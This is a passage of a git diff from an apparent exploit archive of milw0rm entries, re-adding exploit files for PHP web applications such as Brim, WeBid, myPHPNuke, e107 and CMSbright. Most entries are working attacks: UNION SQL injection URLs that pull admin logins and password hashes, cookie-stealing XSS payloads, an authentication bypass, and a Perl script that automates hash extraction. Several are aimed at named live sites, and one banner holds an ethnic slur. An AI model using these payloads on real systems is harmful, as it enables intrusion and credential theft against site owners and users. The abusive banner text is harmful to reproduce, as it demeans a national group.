+		$urlarr = parse_url($urltarg);
+		
+		if(!isset($urlarr['path']) || empty($urlarr['path']))
+		   die("Error: No path precised");
+		
+		$this->url  = $urlarr['path'];
+		
+		if(isset($urlarr['query']))
+		   $this->url .= '?'.$urlarr['query'];
+		
+		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
+		$this->host = $urlarr['host'];
+		
+		if($this->port != '80')
+		   $this->host .= ':'.$this->port;
+
+		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
+		
+		if($this->port > 65535)
+		   die("Error: Invalid port number");
+	}
+	
+	
+	/**
+	 * If you call this function,
+	 * the script will extract all
+	 * 'Set-Cookie' headers values
+	 * and it will automatically add
+	 * them into the 'Cookie' header
+	 * for all next requests.
+	 *
+	 * @access  public
+	 * @param   integer code 1(enabled) 0(disabled)
+	 * @example $this->cookiejar(0)
+	 * @example $this->cookiejar(1)
+	 * 
+	 */
+	function cookiejar($code)
+	{
+		if($code=='0')
+		   $this->cookiejar=FALSE;
+
+		elseif($code=='1')
+		   $this->cookiejar=TRUE;
+	}
+
+
+	/**
+	 * If you call this function,
+	 * the script will follow all
+	 * redirections sent by the server.
+	 * 
+	 * @access  public
+	 * @param   integer code 1(enabled) 0(disabled)
+	 * @example $this->allowredirection(0)
+	 * @example $this->allowredirection(1)
+	 * 
+	 */
+	function allowredirection($code)
+	{
+		if($code=='0')
+		   $this->allowredirection=FALSE;
+		   
+		elseif($code=='1')
+		   $this->allowredirection=TRUE;
+	}
+
+	
+	/**
+	 * This function is called if
+	 * allowredirection() is enabled.
+	 * You don't have to call it.
+	 *
+	 * @access private
+	 * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
+	 * @return string $this->get($this->last_redirection)
+	 * @return string $this->recv;
+	 * 
+	 */
+	function getredirection()
+	{
+		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
+		{
+			$this->last_redirection = trim($codearr[2]);
+			
+			if(!ereg('://',$this->last_redirection))
+			   return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
+
+			else
+			   return $this->get($this->last_redirection);
+		}
+		else
+		   return $this->recv;
+	}
+
+
+	/**
+	 * This function allows you
+	 * to reset some parameters.
+	 * 
+	 * @access  public
+	 * @param   string func Param
+	 * @example $this->reset('header')
+	 * @example $this->reset('cookie')
+	 * @example $this->reset()
+	 * 
+	 */
+	function reset($func='')
+	{
+		switch($func)
+		{
+			case 'header':
+			$this->header = array();
+			break;
+				
+			case 'cookie':
+			$this->cookie = array();
+			break;
+				
+			default:
+			$this->cookiejar = '';
+			$this->header = array();
+			$this->cookie = array();
+			$this->allowredirection = '';
+			break;
+		}
+	}
+}
+
+$web = new phpsploit;
+$web->cookiejar(1);
+$web->agent('Mozilla Firefox');
+
+$ipb = new ipb_spl;
+$ipb->web =& $web;
+$ipb->main();
+
+?>
+
+# milw0rm.com [2008-08-29]
diff --git a/platforms/php/webapps/6332.txt b/platforms/php/webapps/6332.txt
index 789dde99e..debe48a3b 100755
--- a/platforms/php/webapps/6332.txt
+++ b/platforms/php/webapps/6332.txt
@@ -1,75 +1,75 @@
-                          ||          ||   | ||       
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
-                  ( :   /    (_)    /           (   . 
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-<> Found by :  Fisher762
-<> C0ntact  : SQ7@W.CN
-                  
-<> Groups   : InjEctOr5
-
-=======================================================
-+++++++++++++ R3membeR Kings of injection +++++++++++++
-=======================================================
-
-<<->> script    :  Brim 2.0
- 
-<<->> Demo site : http://sourceforge.net/project/showfiles.php?group_id=129562
-
-=======================================================
-++++++++++++++++ pWning israel fuckers ++++++++++++++++
-=======================================================
-
-<<->> D0rk    : :)
-<<->> Exploit :
-
-[SQL]
-
-First register new acc0unt :
-
-http://[targ3t]/brim/signup.php
-
-then go to  y0ur email and active the acc0unt and login
- 
- 
-
-after that  G0 t0 y0ur Plugins and active Tasks plugin
- 
-http://[Targ3t]/brim/PluginController.php
- 
-and finnaly go t0 search url:
-
-http://[Targ3t]/brim/index.php?plugin=tasks&action=search
- 
-and insert this query in any field:
-
-' union select 1,2,3,4,concat(loginname,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17 from brim_users/*
- 
-*******************************************************************************************************
-
-[xss]
- 
-First active Bookmarks Plugin and add new action and in the name field insert:
- 
->">
- 
- 
- 
- 
- 
-##############################################################
-
-#Gr33tz T0: Broken-security, providor , Şŷяįăn ĦλçЌΣr  ,Sp!der_N3T and all my friends :)
-
-# milw0rm.com [2008-08-30]
+                          ||          ||   | ||       
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
+                  ( :   /    (_)    /           (   . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+<> Found by :  Fisher762
+<> C0ntact  : SQ7@W.CN
+                  
+<> Groups   : InjEctOr5
+
+=======================================================
++++++++++++++ R3membeR Kings of injection +++++++++++++
+=======================================================
+
+<<->> script    :  Brim 2.0
+ 
+<<->> Demo site : http://sourceforge.net/project/showfiles.php?group_id=129562
+
+=======================================================
+++++++++++++++++ pWning israel fuckers ++++++++++++++++
+=======================================================
+
+<<->> D0rk    : :)
+<<->> Exploit :
+
+[SQL]
+
+First register new acc0unt :
+
+http://[targ3t]/brim/signup.php
+
+then go to  y0ur email and active the acc0unt and login
+ 
+ 
+
+after that  G0 t0 y0ur Plugins and active Tasks plugin
+ 
+http://[Targ3t]/brim/PluginController.php
+ 
+and finnaly go t0 search url:
+
+http://[Targ3t]/brim/index.php?plugin=tasks&action=search
+ 
+and insert this query in any field:
+
+' union select 1,2,3,4,concat(loginname,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17 from brim_users/*
+ 
+*******************************************************************************************************
+
+[xss]
+ 
+First active Bookmarks Plugin and add new action and in the name field insert:
+ 
+>">
+ 
+ 
+ 
+ 
+ 
+##############################################################
+
+#Gr33tz T0: Broken-security, providor , Şŷяįăn ĦλçЌΣr  ,Sp!der_N3T and all my friends :)
+
+# milw0rm.com [2008-08-30]
diff --git a/platforms/php/webapps/6335.txt b/platforms/php/webapps/6335.txt
index 24b8b7c1e..f650019cb 100755
--- a/platforms/php/webapps/6335.txt
+++ b/platforms/php/webapps/6335.txt
@@ -1,59 +1,59 @@
-|___________________________________________________|
-|
-| Web directory script v1.5.3 (site) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://sourceworkshop.com/advanced_scripts/web_directory_script.html
-|
-| DorK   : "Powered by web directory script"
-|___________________________________________________|
-
-Exploit: 
-________
-
-
-
-www.[target].com/Script/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())--
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://links.sourceworkshop.com/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())--
-
-
-
-
-admin login
-
-admin/index.php
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
-|  
-|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
-|______________________________________________________________________
- 
-
-                       Im IRAQi
-
-# milw0rm.com [2008-08-31]
+|___________________________________________________|
+|
+| Web directory script v1.5.3 (site) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://sourceworkshop.com/advanced_scripts/web_directory_script.html
+|
+| DorK   : "Powered by web directory script"
+|___________________________________________________|
+
+Exploit: 
+________
+
+
+
+www.[target].com/Script/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())--
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://links.sourceworkshop.com/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())--
+
+
+
+
+admin login
+
+admin/index.php
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
+|  
+|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
+|______________________________________________________________________
+ 
+
+                       Im IRAQi
+
+# milw0rm.com [2008-08-31]
diff --git a/platforms/php/webapps/6336.txt b/platforms/php/webapps/6336.txt
index 9de8509f2..e8b4c1bf1 100755
--- a/platforms/php/webapps/6336.txt
+++ b/platforms/php/webapps/6336.txt
@@ -1,67 +1,67 @@
-|___________________________________________________|
-|
-| Words tag script v1.2 (word) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://sourceworkshop.com/advanced_scripts/index.php?id=5
-|
-| DorK   : "Powered by words tag script"
-|___________________________________________________|
-
-Exploit: 
-________
-
-
-
-www.[target].com/Script/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--
-
-
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://words.sourceworkshop.com/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--
-
-
-________________________
-
-table_name : column_name
-
-config_variables:variable_name
-config_variables:value
-config_variables:id
-config_variables:title
-config_variables:text
-config_variables:description
-_______________________
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
-|  
-|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
-|______________________________________________________________________
- 
-
-                       Im IRAQi
-
-# milw0rm.com [2008-08-31]
+|___________________________________________________|
+|
+| Words tag script v1.2 (word) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://sourceworkshop.com/advanced_scripts/index.php?id=5
+|
+| DorK   : "Powered by words tag script"
+|___________________________________________________|
+
+Exploit: 
+________
+
+
+
+www.[target].com/Script/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--
+
+
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://words.sourceworkshop.com/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--
+
+
+________________________
+
+table_name : column_name
+
+config_variables:variable_name
+config_variables:value
+config_variables:id
+config_variables:title
+config_variables:text
+config_variables:description
+_______________________
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
+|  
+|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
+|______________________________________________________________________
+ 
+
+                       Im IRAQi
+
+# milw0rm.com [2008-08-31]
diff --git a/platforms/php/webapps/6338.txt b/platforms/php/webapps/6338.txt
index 6443b5779..a9ff02ea0 100755
--- a/platforms/php/webapps/6338.txt
+++ b/platforms/php/webapps/6338.txt
@@ -1,25 +1,25 @@
-############################################################
-
-Cross-Site Scripting and SQL Injection vulnerabilities in myPHPNuke
-
-By MustLive (http://websecurity.com.ua)
-
-Detailed information: http://websecurity.com.ua/2391/
-
-Description: There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke.
-
-XSS:
-
-http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E
-
-SQL Injection:
-
-http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1
-
-With this query you will receive login and password (hash) of administrator.
-
-Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not vulnerable to these XSS and SQL Injection attacks. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL Injection attack is possible (without using spaces and brackets).
-
-############################################################ 
-
-# milw0rm.com [2008-08-31]
+############################################################
+
+Cross-Site Scripting and SQL Injection vulnerabilities in myPHPNuke
+
+By MustLive (http://websecurity.com.ua)
+
+Detailed information: http://websecurity.com.ua/2391/
+
+Description: There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke.
+
+XSS:
+
+http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E
+
+SQL Injection:
+
+http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1
+
+With this query you will receive login and password (hash) of administrator.
+
+Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not vulnerable to these XSS and SQL Injection attacks. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL Injection attack is possible (without using spaces and brackets).
+
+############################################################ 
+
+# milw0rm.com [2008-08-31]
diff --git a/platforms/php/webapps/6339.txt b/platforms/php/webapps/6339.txt
index e82135772..b635c1f2b 100755
--- a/platforms/php/webapps/6339.txt
+++ b/platforms/php/webapps/6339.txt
@@ -1,92 +1,92 @@
-                         ||          ||   | ||       
-                  o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
-                 ( :   /    (_)    /           (   .
-                   ================================
-                      ==========================
-                         ====================
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-
-Application :: WeBid v0.5.4  Multi Exploit
-
-Found By :: Fisher762 [ SQ7@w.cn ]
-
- Groups   : InjEctOr5
-
-
- 
-Download :: http://www.sourceforge.net/projects/simpleauction
- 
-Dork 1 ::   :P 
-
-###########################[[[[EXPL0!T]]]]]#################################
-
-
-[Bybpass]
-
-
-
-
-Go to admin pannel
-
-
-http://[Targ3t]/[webid]/admin/
-
-
-
-
-username=  ' or 1=1/*
-
-password= ass u like :)
-
-
-__________________________________________________________________________
-
-
-[ edit index css ]
-
-
-
-u can edit  style css file [style.css]
-
-
-http://[Targ3t]/webid/eledicss.php?nid=0&cd=themes/default&file=style.css
-
-
-eX: http://www.fondoempleados.com/eledicss.php?nid=0&cd=themes/default&file=style.css
-
-
-
-__________________________________________________________________________
-
-
-[ view all Site SQL quires]
-
-
-
-
-u can see all SQL quires 
-
-
-
-http://[Targ3t]/webid/logs/cron.log
-
-
-eX: http://www.hardlyeverwornit.com//logs/cron.log
-
-
-###########################[[[[Th3 End]]]]]#################################
-
-# milw0rm.com [2008-08-31]
+                         ||          ||   | ||       
+                  o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
+                 ( :   /    (_)    /           (   .
+                   ================================
+                      ==========================
+                         ====================
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+
+Application :: WeBid v0.5.4  Multi Exploit
+
+Found By :: Fisher762 [ SQ7@w.cn ]
+
+ Groups   : InjEctOr5
+
+
+ 
+Download :: http://www.sourceforge.net/projects/simpleauction
+ 
+Dork 1 ::   :P 
+
+###########################[[[[EXPL0!T]]]]]#################################
+
+
+[Bybpass]
+
+
+
+
+Go to admin pannel
+
+
+http://[Targ3t]/[webid]/admin/
+
+
+
+
+username=  ' or 1=1/*
+
+password= ass u like :)
+
+
+__________________________________________________________________________
+
+
+[ edit index css ]
+
+
+
+u can edit  style css file [style.css]
+
+
+http://[Targ3t]/webid/eledicss.php?nid=0&cd=themes/default&file=style.css
+
+
+eX: http://www.fondoempleados.com/eledicss.php?nid=0&cd=themes/default&file=style.css
+
+
+
+__________________________________________________________________________
+
+
+[ view all Site SQL quires]
+
+
+
+
+u can see all SQL quires 
+
+
+
+http://[Targ3t]/webid/logs/cron.log
+
+
+eX: http://www.hardlyeverwornit.com//logs/cron.log
+
+
+###########################[[[[Th3 End]]]]]#################################
+
+# milw0rm.com [2008-08-31]
diff --git a/platforms/php/webapps/6341.txt b/platforms/php/webapps/6341.txt
index 55aeffd07..49501397c 100755
--- a/platforms/php/webapps/6341.txt
+++ b/platforms/php/webapps/6341.txt
@@ -1,6 +1,6 @@
-Application :: WeBid v0.5.4  sql injection vuln
-Download :: http://www.sourceforge.net/projects/simpleauction
-Found By ::Stack
-http://www.site.il/item.php?id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
-
-# milw0rm.com [2008-09-01]
+Application :: WeBid v0.5.4  sql injection vuln
+Download :: http://www.sourceforge.net/projects/simpleauction
+Found By ::Stack
+http://www.site.il/item.php?id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
+
+# milw0rm.com [2008-09-01]
diff --git a/platforms/php/webapps/6342.txt b/platforms/php/webapps/6342.txt
index 60e27d10c..1f473a6fe 100755
--- a/platforms/php/webapps/6342.txt
+++ b/platforms/php/webapps/6342.txt
@@ -1,20 +1,20 @@
-##############EasyClassifields v3.0 SQL Injection#######################
-
-####By:     e.wiZz!
-####Info:   Bosnian Idiot FTW!
-####Site:  infected.blogger.ba
-####Greetz:   Luigi,suN8Hclf,str0ke
-In the wild...
-
-##################################################################
-
-###Script Site: http://myiosoft.com/?1.6.0.0
-###Vulnerability:
-
-http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=
-
-PoC on demo site:
-
-http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user
-
-# milw0rm.com [2008-09-01]
+##############EasyClassifields v3.0 SQL Injection#######################
+
+####By:     e.wiZz!
+####Info:   Bosnian Idiot FTW!
+####Site:  infected.blogger.ba
+####Greetz:   Luigi,suN8Hclf,str0ke
+In the wild...
+
+##################################################################
+
+###Script Site: http://myiosoft.com/?1.6.0.0
+###Vulnerability:
+
+http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=
+
+PoC on demo site:
+
+http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user
+
+# milw0rm.com [2008-09-01]
diff --git a/platforms/php/webapps/6343.txt b/platforms/php/webapps/6343.txt
index f61da88fc..ed6c28700 100755
--- a/platforms/php/webapps/6343.txt
+++ b/platforms/php/webapps/6343.txt
@@ -1,26 +1,26 @@
--------------------------------------------
-Script  :  CMSbright ..
- 
-site     :  http://www.cmsbright.com/
- 
-Author :  BorN To K!LL
- 
-Dork    :  powered by CMSbright © websens
--------------------------------------------
- 
-Exploit   :
- 
-public/page.php?id_rub_page=[SQL]
- 
-Example :
- 
-public/page.php?id_rub_page=-9990+union+all+select+concat(version(),database(),user()),2,3,4--
- 
--------------------------------------------  
-Greets :
- 
-Dr.2  ,  General C  ,  CcTero0liTi  ,  GolD_M .. & all my friends ..
- 
--------------------------------------------
-
-# milw0rm.com [2008-09-01]
+-------------------------------------------
+Script  :  CMSbright ..
+ 
+site     :  http://www.cmsbright.com/
+ 
+Author :  BorN To K!LL
+ 
+Dork    :  powered by CMSbright © websens
+-------------------------------------------
+ 
+Exploit   :
+ 
+public/page.php?id_rub_page=[SQL]
+ 
+Example :
+ 
+public/page.php?id_rub_page=-9990+union+all+select+concat(version(),database(),user()),2,3,4--
+ 
+-------------------------------------------  
+Greets :
+ 
+Dr.2  ,  General C  ,  CcTero0liTi  ,  GolD_M .. & all my friends ..
+ 
+-------------------------------------------
+
+# milw0rm.com [2008-09-01]
diff --git a/platforms/php/webapps/6346.pl b/platforms/php/webapps/6346.pl
index 7308b9bd9..e31adf10c 100755
--- a/platforms/php/webapps/6346.pl
+++ b/platforms/php/webapps/6346.pl
@@ -1,53 +1,53 @@
-#!/usr/bin/perl 
-##############################################################
-# e107 Plugin BLOG Engine v2.2  SQL Injection Exploit        # 
-#               ..::virangar security team::..               # 
-#                    www.virangar.net                        # 
-#         C0d3d BY:virangar security team ( hadihadi  )      # 
-#special tnx to:                                             # 
-#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra              # 
-#& all virangar members & all hackerz                        # 
-# my lovely friends hadi_aryaie2004 & arash(imm02tal)        # 
-#             ..:::Young Iranina Hackerz::..                 # 
-############################################################## 
- 
- 
-use HTTP::Request; 
-use LWP::UserAgent; 
- 
-if (@ARGV != 1){ 
-header(); 
-} 
-$site = $ARGV[0]; 
- 
-$attack= "$site"."?uid=-99999%20union%20select%201,concat(0x3c757365723e,user_name,0x3c757365723e,user_password),3%20from%20e107_user%20where%20user_ 
-id=1/*"; 
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; 
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); 
-$req = $b->request(HTTP::Request->new(GET=>$attack)); 
-$res = $req->content; 
- 
-if ($res =~ /(.*?)/){ 
-        print "\n[+] Admin User : $1";} 
-if ($res =~/([0-9a-fA-F]{32})/){ 
-print "\n[+] Admin Hash : $1\n\n"; 
-print "\n[+]Done\n";} 
- 
-sub header { 
-print qq{ 
-################################################################### 
-# e107 Plugin BLOG Engine v2.2  SQL Injection Exploit             # 
-#                      www.virangar.net                           # 
-#   Useage: perl $0 Host                                          # 
-#                                                                 # 
-#   Host: full patch to macgurublog.php (dont forget http://)     # 
-#                                                                 # 
-#  Example:                                                       # 
-# perl $0 http://site/macgurublog_menu/macgurublog.php            # 
-#                                                                 # 
-################################################################### 
-}; 
-} 
-#virangar.net[2008-05-22] 
-
-# milw0rm.com [2008-09-01]
+#!/usr/bin/perl 
+##############################################################
+# e107 Plugin BLOG Engine v2.2  SQL Injection Exploit        # 
+#               ..::virangar security team::..               # 
+#                    www.virangar.net                        # 
+#         C0d3d BY:virangar security team ( hadihadi  )      # 
+#special tnx to:                                             # 
+#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra              # 
+#& all virangar members & all hackerz                        # 
+# my lovely friends hadi_aryaie2004 & arash(imm02tal)        # 
+#             ..:::Young Iranina Hackerz::..                 # 
+############################################################## 
+ 
+ 
+use HTTP::Request; 
+use LWP::UserAgent; 
+ 
+if (@ARGV != 1){ 
+header(); 
+} 
+$site = $ARGV[0]; 
+ 
+$attack= "$site"."?uid=-99999%20union%20select%201,concat(0x3c757365723e,user_name,0x3c757365723e,user_password),3%20from%20e107_user%20where%20user_ 
+id=1/*"; 
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; 
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); 
+$req = $b->request(HTTP::Request->new(GET=>$attack)); 
+$res = $req->content; 
+ 
+if ($res =~ /(.*?)/){ 
+        print "\n[+] Admin User : $1";} 
+if ($res =~/([0-9a-fA-F]{32})/){ 
+print "\n[+] Admin Hash : $1\n\n"; 
+print "\n[+]Done\n";} 
+ 
+sub header { 
+print qq{ 
+################################################################### 
+# e107 Plugin BLOG Engine v2.2  SQL Injection Exploit             # 
+#                      www.virangar.net                           # 
+#   Useage: perl $0 Host                                          # 
+#                                                                 # 
+#   Host: full patch to macgurublog.php (dont forget http://)     # 
+#                                                                 # 
+#  Example:                                                       # 
+# perl $0 http://site/macgurublog_menu/macgurublog.php            # 
+#                                                                 # 
+################################################################### 
+}; 
+} 
+#virangar.net[2008-05-22] 
+
+# milw0rm.com [2008-09-01]
diff --git a/platforms/php/webapps/6347.txt b/platforms/php/webapps/6347.txt
index f90203152..9b51d9442 100755
--- a/platforms/php/webapps/6347.txt
+++ b/platforms/php/webapps/6347.txt
@@ -1,25 +1,25 @@
-############################################################
-
-SQL Injection vulnerability in myPHPNuke
-
-By MustLive (http://websecurity.com.ua)
-
-Detailed information: http://websecurity.com.ua/2398/
-
-Description: There is SQL Injection vulnerability in printfeature.php in
-myPHPNuke.
-
-SQL Injection:
-
-http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1
-
-With this query you will receive login and password (hash) of administrator.
-
-Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the
-additional filters were added, so it is not vulnerable to this attack. But
-version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL
-Injection attack is possible (without using spaces and brackets).
-
-############################################################
-
-# milw0rm.com [2008-09-02]
+############################################################
+
+SQL Injection vulnerability in myPHPNuke
+
+By MustLive (http://websecurity.com.ua)
+
+Detailed information: http://websecurity.com.ua/2398/
+
+Description: There is SQL Injection vulnerability in printfeature.php in
+myPHPNuke.
+
+SQL Injection:
+
+http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1
+
+With this query you will receive login and password (hash) of administrator.
+
+Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the
